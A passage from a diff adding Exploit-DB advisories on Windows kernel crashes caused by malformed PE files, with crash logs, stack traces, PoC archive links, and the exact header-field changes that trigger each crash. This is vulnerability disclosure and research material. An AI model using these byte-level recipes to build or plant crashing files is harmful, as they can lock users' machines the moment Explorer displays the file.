+Arg4: 0000000000000000, zero.
+
+[...]
+
+CONTEXT:  ffffd20ad8e1e290 -- (.cxr 0xffffd20ad8e1e290)
+rax=00000000000000a2 rbx=ffffab829154f420 rcx=0000000000000000
+rdx=0000000000000002 rsi=0000000000000000 rdi=ffffab828fb6f690
+rip=fffff8006f0860c4 rsp=ffffd20ad8e1ec80 rbp=000000000000000b
+ r8=ffffd20ad8e1ed90  r9=ffffab828fb6f690 r10=ffffab828fb6f690
+r11=ffffe601c2e7f7b0 r12=0000000001000000 r13=0000000000000002
+r14=000000000000a008 r15=ffffd20ad8e1ed90
+iopl=0         nv up ei pl zr na po nc
+cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00050246
+nt!MiOffsetToProtos+0x324:
+fffff800`6f0860c4 8b562c          mov     edx,dword ptr [rsi+2Ch] ds:002b:00000000`0000002c=????????
+Resetting default scope
+
+[...]
+
+STACK_TEXT:  
+ffffd20a`d8e1ec80 fffff800`6f62a3f9 : ffffab82`8fb6f6d0 ffffab82`9154f420 00000000`00000048 ffffab82`8fb6f690 : nt!MiOffsetToProtos+0x324
+ffffd20a`d8e1ed60 fffff800`6f6d6105 : ffffab82`9154f420 ffffd20a`d8e1efb0 ffffd20a`d8e1ef50 00000000`0000b000 : nt!MiLogRelocationRva+0x29
+ffffd20a`d8e1edb0 fffff800`6f5fc56a : ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffd20a`d8e1efb0 ffffd20a`d8e1f180 : nt!MiParseComImage+0xd9
+ffffd20a`d8e1eeb0 fffff800`6f5dca20 : ffffab82`9154f420 ffffd20a`d8e1f180 ffffd20a`d8e1f180 ffffab82`9154f3f0 : nt!MiCreateNewSection+0x2b6
+ffffd20a`d8e1f010 fffff800`6f5dcd24 : ffffd20a`d8e1f040 ffffe601`c3b87f40 ffffab82`9154f420 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
+ffffd20a`d8e1f100 fffff800`6f5dc37f : 00000000`11000000 ffffd20a`d8e1f4c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
+ffffd20a`d8e1f280 fffff800`6f5dc110 : 00000005`e1478f48 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
+ffffd20a`d8e1f360 fffff800`6f1ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
+ffffd20a`d8e1f3d0 00007ffb`2815c9a4 : 00007ffb`25251ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
+00000005`e1478ed8 00007ffb`25251ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
+00000005`e1478ee0 00007ffb`25255640 : 0000019b`db947d00 00000024`00000000 00007ffb`26202770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
+00000005`e1479110 00007ffb`2523c41d : 0000019b`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
+00000005`e1479180 00007ffb`272503d1 : 0000019b`db9497c0 00000000`00000000 0000019b`db948c30 00007ffb`27266d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
+00000005`e14791e0 00007ffb`2725035c : 00000000`00000000 00007ffb`257610ff 0000019b`db9497c0 00000005`e1479530 : shell32!_LoadVersionInfo+0x39
+00000005`e1479250 00007ffb`257dc1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
+
+[...]
+--- cut ---
+
+The direct cause of the crash is an attempt to read from a near-zero address. As the address does not seem to be controlled, and NULL page mappings are prohibited in modern systems (except for when NTVDM is enabled on 32-bit platforms), we classify it as a Denial of Service vulnerability.
+
+We have not determined the specific root cause of the issue, but we have found that it is related to the processing of .NET executables. We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file: one which increases the value of the SizeOfImage field from 0xa000 to 0xa100, and one that changes the CLR Runtime Header data directory address from 0x2008 to 0xa008.
+
+The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html.
+
+Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47485.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47486.txt b/exploits/windows/dos/47486.txt
new file mode 100644
index 000000000..82c774c53
--- /dev/null
+++ b/exploits/windows/dos/47486.txt
@@ -0,0 +1,92 @@
+We have encountered a Windows kernel crash in CI!CipFixImageType while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x00000050
+                       (0xFFFFF8007B6E00AC,0x0000000000000000,0xFFFFF80079A7E5C1,0x0000000000000000)
+
+Driver at fault: 
+***        CI.dll - Address FFFFF80079A7E5C1 base at FFFFF80079A30000, DateStamp 8581dc0d
+.
+Break instruction exception - code 80000003 (first chance)
+
+A fatal system error has occurred.
+Debugger entered on first try; Bugcheck callbacks have not been invoked.
+
+A fatal system error has occurred.
+
+[...]
+
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced.  This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+Arg1: fffff8007b6e00ac, memory referenced.
+Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
+Arg3: fffff80079a7e5c1, If non-zero, the instruction address which referenced the bad memory
+	address.
+Arg4: 0000000000000000, (reserved)
+
+[...]
+
+TRAP_FRAME:  fffffa8375df1860 -- (.trap 0xfffffa8375df1860)
+NOTE: The trap frame does not contain all registers.
+Some register values may be zeroed or incorrect.
+rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000000
+rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff80079a7e5c1 rsp=fffffa8375df19f0 rbp=fffffa8375df1b30
+ r8=00000000000000c0  r9=fffff8007b6d0080 r10=0000000000000004
+r11=fffff8007b6e0070 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei ng nz ac po cy
+CI!CipFixImageType+0x9d:
+fffff800`79a7e5c1 418b44cb3c      mov     eax,dword ptr [r11+rcx*8+3Ch] ds:fffff800`7b6e00ac=????????
+Resetting default scope
+
+LAST_CONTROL_TRANSFER:  from fffff80077ea6642 to fffff80077dc46a0
+
+STACK_TEXT:  
+fffffa83`75df0e18 fffff800`77ea6642 : fffff800`7b6e00ac 00000000`00000003 fffffa83`75df0f80 fffff800`77d22be0 : nt!DbgBreakPointWithStatus
+fffffa83`75df0e20 fffff800`77ea5d32 : fffff800`00000003 fffffa83`75df0f80 fffff800`77dd0fb0 fffffa83`75df14c0 : nt!KiBugCheckDebugBreak+0x12
+fffffa83`75df0e80 fffff800`77dbca07 : ffff8ac5`62b15f80 fffff800`77ed0110 00000000`00000000 fffff800`78063900 : nt!KeBugCheck2+0x952
+fffffa83`75df1580 fffff800`77de0161 : 00000000`00000050 fffff800`7b6e00ac 00000000`00000000 fffffa83`75df1860 : nt!KeBugCheckEx+0x107
+fffffa83`75df15c0 fffff800`77c7aaef : 00000000`00000000 00000000`00000000 00000000`00000000 fffff800`7b6e00ac : nt!MiSystemFault+0x1d3171
+fffffa83`75df16c0 fffff800`77dca920 : fffff800`7b6d0000 00000000`00000000 ffffe687`5031c180 00000000`00000000 : nt!MmAccessFault+0x34f
+fffffa83`75df1860 fffff800`79a7e5c1 : ffffe687`4f6b1080 fffff800`7b6d0080 00000000`00000000 fffff800`79a67280 : nt!KiPageFault+0x360
+fffffa83`75df19f0 fffff800`79a7c879 : fffffa83`75df1cd0 00000000`00000000 00000000`c00000bb 00000000`00000000 : CI!CipFixImageType+0x9d
+fffffa83`75df1a30 fffff800`78285766 : fffffa83`75df1c70 fffff800`7b6d0000 00000000`0000000e fffff800`7b6d0000 : CI!CiValidateImageHeader+0x279
+fffffa83`75df1bb0 fffff800`7828528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00011000 : nt!SeValidateImageHeader+0xd6
+fffffa83`75df1c60 fffff800`7821e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436
+fffffa83`75df1e50 fffff800`781fc861 : fffffa83`75df2180 fffffa83`75df1fb0 00000000`40000000 fffffa83`75df2180 : nt!MiValidateSectionSigningPolicy+0xa6
+fffffa83`75df1eb0 fffff800`781dca20 : ffffe687`5031c180 fffffa83`75df2180 fffffa83`75df2180 ffffe687`5031c150 : nt!MiCreateNewSection+0x5ad
+fffffa83`75df2010 fffff800`781dcd24 : fffffa83`75df2040 ffffd483`86519790 ffffe687`5031c180 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
+fffffa83`75df2100 fffff800`781dc37f : 00000000`11000000 fffffa83`75df24c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
+fffffa83`75df2280 fffff800`781dc110 : 000000bc`f7c78928 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
+fffffa83`75df2360 fffff800`77dce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
+fffffa83`75df23d0 00007ffe`5771c9a4 : 00007ffe`54641ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
+000000bc`f7c788b8 00007ffe`54641ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
+000000bc`f7c788c0 00007ffe`54645640 : 00000203`34a8b3d0 00000007`00000000 00007ffe`56d32770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
+000000bc`f7c78af0 00007ffe`5462c41d : 00000203`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
+000000bc`f7c78b60 00007ffe`559f03d1 : 00000203`34a79130 00000000`00000000 00000203`34a96190 00007ffe`55a06d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
+000000bc`f7c78bc0 00007ffe`559f035c : 00000000`00000000 00007ffe`549f10ff 00000203`34a79130 000000bc`f7c78f10 : shell32!_LoadVersionInfo+0x39
+000000bc`f7c78c30 00007ffe`54a6c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
+
+[...]
+--- cut ---
+
+The direct cause of the crash is an attempt to read from an invalid out-of-bounds address relative to the kernel mapping of the parsed PE file. Specifically, we believe that it is caused by the lack of proper sanitization of the IMAGE_FILE_HEADER.SizeOfOptionalHeader field.
+
+We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which increases the value of the SizeOfOptionalHeader field from 0x00e0 to 0x66e0, one that decreases SizeOfImage from 0x8400 to 0x0e00, and one that changes DllCharacteristics from 0 to 0x89 (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | 9).
+
+The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive.
+
+Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47486.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47487.txt b/exploits/windows/dos/47487.txt
new file mode 100644
index 000000000..dfc98a4a4
--- /dev/null
+++ b/exploits/windows/dos/47487.txt
@@ -0,0 +1,86 @@
+We have encountered a Windows kernel crash in memcpy() called by nt!MiParseImageLoadConfig while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x00000050
+                       (0xFFFFF805751F5000,0x0000000000000000,0xFFFFF805773CF6E5,0x0000000000000000)
+
+Break instruction exception - code 80000003 (first chance)
+
+A fatal system error has occurred.
+Debugger entered on first try; Bugcheck callbacks have not been invoked.
+
+A fatal system error has occurred.
+
+[...]
+
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced.  This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+Arg1: fffff805751f5000, memory referenced.
+Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
+Arg3: fffff805773cf6e5, If non-zero, the instruction address which referenced the bad memory
+	address.
+Arg4: 0000000000000000, (reserved)
+
+[...]
+
+TRAP_FRAME:  ffff8380cd506820 -- (.trap 0xffff8380cd506820)
+NOTE: The trap frame does not contain all registers.
+Some register values may be zeroed or incorrect.
+rax=000000000000005c rbx=0000000000000000 rcx=ffff8380cd506c80
+rdx=00007484a7cee364 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff805773cf6e5 rsp=ffff8380cd5069b8 rbp=ffff8380cd506fb0
+ r8=0000000000000008  r9=0000000000000003 r10=000000000000020b
+r11=ffff8380cd506be0 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei pl nz na po nc
+nt!memcpy+0xa5:
+fffff805`773cf6e5 f30f6f4c1110    movdqu  xmm1,xmmword ptr [rcx+rdx+10h] ds:fffff805`751f4ff4=????????????????????????????????
+Resetting default scope
+
+LAST_CONTROL_TRANSFER:  from fffff805774a6642 to fffff805773c46a0
+
+STACK_TEXT:  
+ffff8380`cd505dd8 fffff805`774a6642 : fffff805`751f5000 00000000`00000003 ffff8380`cd505f40 fffff805`77322be0 : nt!DbgBreakPointWithStatus
+ffff8380`cd505de0 fffff805`774a5d32 : fffff805`00000003 ffff8380`cd505f40 fffff805`773d0f60 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
+ffff8380`cd505e40 fffff805`773bca07 : fffff078`3c1e0f80 fffff805`774d0110 00000000`00000000 fffff805`77663900 : nt!KeBugCheck2+0x952
+ffff8380`cd506540 fffff805`773e0161 : 00000000`00000050 fffff805`751f5000 00000000`00000000 ffff8380`cd506820 : nt!KeBugCheckEx+0x107
+ffff8380`cd506580 fffff805`7727aaef : fffff805`77663900 00000000`00000000 00000000`00000000 fffff805`751f5000 : nt!MiSystemFault+0x1d3171
+ffff8380`cd506680 fffff805`773ca920 : ffff8380`cd5068b0 fffff805`773caa4e fffff805`75000000 fffff078`3c1f1000 : nt!MmAccessFault+0x34f
+ffff8380`cd506820 fffff805`773cf6e5 : fffff805`7788397d ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 : nt!KiPageFault+0x360
+ffff8380`cd5069b8 fffff805`7788397d : ffff8d03`15813460 fffff805`7723944d ffff8d03`15813080 ffff8d03`15cab288 : nt!memcpy+0xa5
+ffff8380`cd5069c0 fffff805`7788238e : fffff805`75000000 ffffaf0f`9d705048 00000000`00000000 00000000`001f5000 : nt!MiParseImageLoadConfig+0x171
+ffff8380`cd506d40 fffff805`777fc8a3 : ffff8380`cd507180 ffff8380`cd507180 ffff8380`cd506fb0 ffff8380`cd507180 : nt!MiRelocateImage+0x2fe
+ffff8380`cd506eb0 fffff805`777dca20 : ffff8d03`1526e520 ffff8380`cd507180 ffff8380`cd507180 ffff8d03`1526e4f0 : nt!MiCreateNewSection+0x5ef
+ffff8380`cd507010 fffff805`777dcd24 : ffff8380`cd507040 ffffaf0f`9d530760 ffff8d03`1526e520 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
+ffff8380`cd507100 fffff805`777dc37f : 00000000`11000000 ffff8380`cd5074c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
+ffff8380`cd507280 fffff805`777dc110 : 000000c1`e89f8e28 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
+ffff8380`cd507360 fffff805`773ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
+ffff8380`cd5073d0 00007ff8`2fa5c9a4 : 00007ff8`2d7c1ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
+000000c1`e89f8db8 00007ff8`2d7c1ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
+000000c1`e89f8dc0 00007ff8`2d7c5640 : 000001d3`61bac500 0000002e`00000000 00007ff8`2f292770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
+000000c1`e89f8ff0 00007ff8`2d7ac41d : 000001d3`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
+000000c1`e89f9060 00007ff8`2dd503d1 : 000001d3`61bd1d10 00000000`00000000 000001d3`61bb94d0 00007ff8`2dd66d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
+000000c1`e89f90c0 00007ff8`2dd5035c : 00000000`00000000 00007ff8`2ced10ff 000001d3`61bd1d10 000000c1`e89f9410 : shell32!_LoadVersionInfo+0x39
+000000c1`e89f9130 00007ff8`2cf4c1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
+000000c1`e89f9160 00007ff8`2cee23d4 : 00000000`00000080 00000000`00000000 00000000`80004002 00000000`f20003f1 : windows_storage!InitializeFileHandlerWithFile+0xc9
+
+[...]
+--- cut ---
+
+We have minimized one of the crashing samples down to a 2-byte difference in relation to the original file, which change the Load Configuration Directory address from 0x1e4644 to 0x1f4f44.
+
+The issue reproduces on Windows 10 and Windows Server 2019 (32-bit and 64-bit, Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive.
+
+Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and three additional non-minimized samples. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47487.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47488.txt b/exploits/windows/dos/47488.txt
new file mode 100644
index 000000000..df2c61fe3
--- /dev/null
+++ b/exploits/windows/dos/47488.txt
@@ -0,0 +1,93 @@
+We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file (i.e. LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE)). An example crash log generated after triggering the bug is shown below:
+
+--- cut ---
+*** Fatal System Error: 0x00000050
+                       (0xFFFFF80068F02000,0x0000000000000000,0xFFFFF80067291A2C,0x0000000000000000)
+
+Driver at fault: 
+***        CI.dll - Address FFFFF80067291A2C base at FFFFF80067230000, DateStamp 8581dc0d
+.
+Break instruction exception - code 80000003 (first chance)
+
+A fatal system error has occurred.
+Debugger entered on first try; Bugcheck callbacks have not been invoked.
+
+A fatal system error has occurred.
+
+[...]
+
+*******************************************************************************
+*                                                                             *
+*                        Bugcheck Analysis                                    *
+*                                                                             *
+*******************************************************************************
+
+PAGE_FAULT_IN_NONPAGED_AREA (50)
+Invalid system memory was referenced.  This cannot be protected by try-except.
+Typically the address is just plain bad or it is pointing at freed memory.
+Arguments:
+Arg1: fffff80068f02000, memory referenced.
+Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
+Arg3: fffff80067291a2c, If non-zero, the instruction address which referenced the bad memory
+	address.
+Arg4: 0000000000000000, (reserved)
+
+[...]
+
+TRAP_FRAME:  ffffe20f4b7d6400 -- (.trap 0xffffe20f4b7d6400)
+NOTE: The trap frame does not contain all registers.
+Some register values may be zeroed or incorrect.
+rax=00000000000000c8 rbx=0000000000000000 rcx=144670b8d60e0000
+rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
+rip=fffff80067291a2c rsp=ffffe20f4b7d6590 rbp=ffffe20f4b7d6690
+ r8=00000000fffffe00  r9=fffff80068ef0000 r10=0000000000000002
+r11=ffffe20f4b7d6760 r12=0000000000000000 r13=0000000000000000
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei pl nz na pe nc
+CI!HashKComputeFirstPageHash+0x1f4:
+fffff800`67291a2c 418b5dd4        mov     ebx,dword ptr [r13-2Ch] ds:ffffffff`ffffffd4=????????
+Resetting default scope
+
+LAST_CONTROL_TRANSFER:  from fffff80065aa6642 to fffff800659c46a0
+
+STACK_TEXT:  
+ffffe20f`4b7d59b8 fffff800`65aa6642 : fffff800`68f02000 00000000`00000003 ffffe20f`4b7d5b20 fffff800`65922be0 : nt!DbgBreakPointWithStatus
+ffffe20f`4b7d59c0 fffff800`65aa5d32 : fffff800`00000003 ffffe20f`4b7d5b20 fffff800`659d0fb0 ffffe20f`4b7d6060 : nt!KiBugCheckDebugBreak+0x12
+ffffe20f`4b7d5a20 fffff800`659bca07 : ffff8bc5`e2f17f80 fffff800`65ad0110 00000000`00000000 fffff800`65c63900 : nt!KeBugCheck2+0x952
+ffffe20f`4b7d6120 fffff800`659e0161 : 00000000`00000050 fffff800`68f02000 00000000`00000000 ffffe20f`4b7d6400 : nt!KeBugCheckEx+0x107
+ffffe20f`4b7d6160 fffff800`6587aaef : fffffb00`023b21b0 00000000`00000000 00000000`00000000 fffff800`68f02000 : nt!MiSystemFault+0x1d3171
+ffffe20f`4b7d6260 fffff800`659ca920 : ffffe20f`4b7d6860 00000000`00000000 00000000`00000200 fffff800`65c651c0 : nt!MmAccessFault+0x34f
+ffffe20f`4b7d6400 fffff800`67291a2c : 00000000`00000000 ffffe20f`4b7d6690 00000000`00000000 00000000`00001000 : nt!KiPageFault+0x360
+ffffe20f`4b7d6590 fffff800`67280829 : 00000000`00000000 ffffce0d`8ae71003 ffffac8f`23a2a9e8 00000000`00000000 : CI!HashKComputeFirstPageHash+0x1f4
+ffffe20f`4b7d67c0 fffff800`6727f10d : ffffac8f`23a2a5a0 ffffce0d`8ae71080 ffffce0d`00000000 00000000`00000000 : CI!CipGetEmbeddedSignatureAndFindFirstMatch+0x181
+ffffe20f`4b7d6860 fffff800`6727e89a : ffffac8f`23a2a5a0 ffffce0d`8b7e1d50 ffffce0d`8ae71080 fffff800`68ef0000 : CI!CipValidatePageHash+0xfd
+ffffe20f`4b7d6950 fffff800`6727cc8b : fffff800`6727f010 ffffe20f`4b7d6c8c ffffce0d`8b7e1d50 ffffce0d`8ae71080 : CI!CipValidateImageHash+0xe6
+ffffe20f`4b7d6a30 fffff800`65e85766 : ffffe20f`4b7d6c70 fffff800`68ef0000 00000000`0000000e fffff800`68ef0000 : CI!CiValidateImageHeader+0x68b
+ffffe20f`4b7d6bb0 fffff800`65e8528a : 00000000`00000000 00000000`00000001 00000000`00000000 00000000`00012000 : nt!SeValidateImageHeader+0xd6
+ffffe20f`4b7d6c60 fffff800`65e1e0da : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!MiValidateSectionCreate+0x436
+ffffe20f`4b7d6e50 fffff800`65dfc861 : ffffe20f`4b7d7180 ffffe20f`4b7d6fb0 00000000`40000000 ffffe20f`4b7d7180 : nt!MiValidateSectionSigningPolicy+0xa6
+ffffe20f`4b7d6eb0 fffff800`65ddca20 : ffffce0d`8b7e1d50 ffffe20f`4b7d7180 ffffe20f`4b7d7180 ffffce0d`8b7e1d20 : nt!MiCreateNewSection+0x5ad
+ffffe20f`4b7d7010 fffff800`65ddcd24 : ffffe20f`4b7d7040 ffffac8f`2af6a9f0 ffffce0d`8b7e1d50 00000000`00000000 : nt!MiCreateImageOrDataSection+0x2d0
+ffffe20f`4b7d7100 fffff800`65ddc37f : 00000000`11000000 ffffe20f`4b7d74c0 00000000`00000001 00000000`00000002 : nt!MiCreateSection+0xf4
+ffffe20f`4b7d7280 fffff800`65ddc110 : 00000010`0e3f8dc8 00000000`00000005 00000000`00000000 00000000`00000001 : nt!MiCreateSectionCommon+0x1ff
+ffffe20f`4b7d7360 fffff800`659ce115 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateSection+0x60
+ffffe20f`4b7d73d0 00007ffe`c317c9a4 : 00007ffe`c0511ae7 00000000`00000000 00000000`00000001 40b28496`f324e4f9 : nt!KiSystemServiceCopyEnd+0x25
+00000010`0e3f8d58 00007ffe`c0511ae7 : 00000000`00000000 00000000`00000001 40b28496`f324e4f9 feafc9c1`1796ffa1 : ntdll!NtCreateSection+0x14
+00000010`0e3f8d60 00007ffe`c0515640 : 00000129`5f442be0 0000001b`00000000 00007ffe`c1f72770 00000000`00000022 : KERNELBASE!BasepLoadLibraryAsDataFileInternal+0x2e7
+00000010`0e3f8f90 00007ffe`c04fc41d : 00000129`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNELBASE!LoadLibraryExW+0xe0
+00000010`0e3f9000 00007ffe`c16903d1 : 00000129`5f414f00 00000000`00000000 00000129`5f443840 00007ffe`c16a6d85 : KERNELBASE!GetFileVersionInfoSizeExW+0x3d
+00000010`0e3f9060 00007ffe`c169035c : 00000000`00000000 00007ffe`c08710ff 00000129`5f414f00 00000010`0e3f93b0 : shell32!_LoadVersionInfo+0x39
+00000010`0e3f90d0 00007ffe`c08ec1c1 : 00000000`00000000 00000000`00000000 ffffffff`fffffffe 00000000`00000000 : shell32!CVersionPropertyStore::Initialize+0x2c
+
+[...]
+--- cut ---
+
+We have minimized one of the crashing samples down to a 3-byte difference in relation to the original file: one which decreases NumberOfSections from 4 to 3, one which increases SizeOfOptionalHeader from 0xF0 to 0xCEF0, and one which changes DllCharacteristics from 0 to 0x00FF (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE | 0xf).
+
+The issue reproduces on Windows 10 and Windows Server 2019 64-bit (Special Pools not required). The crash occurs when any system component calls LoadLibraryEx(LOAD_LIBRARY_AS_DATAFILE | LOAD_LIBRARY_AS_IMAGE_RESOURCE) against the file, either directly or through another API such as GetFileVersionInfoSizeExW() or GetFileVersionInfoW(). In practice, this means that as soon as the file is displayed in Explorer, or the user hovers the cursor over it, or tries to open the file properties, or tries to rename it or perform any other similar action, the system will panic. In other words, just downloading such a file may permanently block the user's machine until they remove it through Recovery Mode etc. The attack scenario is similar to the one described in https://www.fortinet.com/blog/threat-research/microsoft-windows-remote-kernel-crash-vulnerability.html. Due to the nature of the bug (OOB read), it could be also potentially exploited as a limited information disclosure primitive.
+
+Attached is an archive with a minimized proof-of-concept PE image, the original file used to generate it, and one additional non-minimized sample. Please be careful when unpacking the ZIP as Windows may crash immediately once it sees the corrupted files on disk.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47488.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47489.txt b/exploits/windows/dos/47489.txt
new file mode 100644
index 000000000..904955ff5
--- /dev/null
+++ b/exploits/windows/dos/47489.txt
@@ -0,0 +1,79 @@
